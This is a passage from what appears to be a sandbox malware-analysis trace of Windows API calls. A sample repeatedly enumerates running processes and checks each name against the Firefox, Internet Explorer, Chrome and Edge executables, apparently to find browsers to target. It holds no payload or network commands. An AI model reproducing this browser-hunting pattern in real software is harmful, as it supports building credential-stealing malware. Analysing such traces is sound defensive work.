pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0188.703] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0188.703] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0188.703] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0188.703] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.703] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.703] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0188.703] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0188.703] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0188.703] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.703] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.704] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.704] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.704] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.704] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.704] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0188.704] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0188.704] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0188.704] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0188.704] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.704] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.705] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.705] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.705] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.705] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.705] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0188.705] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0188.705] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0188.705] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0188.706] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.706] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.706] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.706] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.706] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.706] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.706] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.707] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.707] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.707] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.707] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.707] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0188.707] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0188.707] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0188.707] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0188.707] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.707] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.708] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0188.708] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0188.708] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0188.708] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.708] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.709] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.709] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.709] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.709] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.709] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.709] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.709] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.709] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.709] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.709] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.710] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.710] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.710] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.710] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.710] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.710] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.710] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.710] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.710] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.710] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0188.711] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0188.711] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0188.711] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0188.711] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0188.711] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0188.711] CloseHandle (hObject=0xd4) returned 1 [0188.711] Sleep (dwMilliseconds=0x3e8) [0189.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0189.754] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.754] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0189.754] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0189.754] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0189.754] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0189.754] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.755] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0189.755] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0189.755] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0189.755] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0189.755] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.755] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0189.755] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0189.755] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0189.756] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.756] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.756] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0189.756] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0189.756] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0189.756] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.756] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.757] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0189.757] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0189.757] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0189.757] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.757] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.757] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0189.757] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0189.757] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0189.757] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.757] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.758] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0189.758] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0189.758] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0189.758] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.758] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.758] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0189.758] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0189.758] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0189.758] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.758] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.759] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0189.759] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0189.759] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0189.759] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.759] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0189.760] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0189.760] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0189.760] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0189.760] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.760] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.760] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.760] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.760] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.760] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.760] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.761] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.761] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.761] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.761] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.761] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.761] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.761] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.761] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.761] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.761] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.762] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.762] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.762] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.762] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.762] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.763] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.763] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.763] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.763] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.763] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.763] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0189.763] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0189.763] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0189.763] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.763] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.764] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.764] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.764] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.764] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.764] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.766] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.766] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.766] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.766] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.766] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.767] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0189.767] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0189.767] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0189.767] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.767] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.768] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0189.768] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0189.768] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0189.768] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.768] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0189.768] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0189.768] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0189.768] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0189.768] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.768] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.769] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.769] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.769] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.769] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.769] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0189.769] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0189.769] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0189.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0189.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.770] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0189.770] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0189.770] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0189.770] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0189.770] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.770] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0189.771] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0189.771] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0189.771] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0189.771] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.771] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0189.771] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 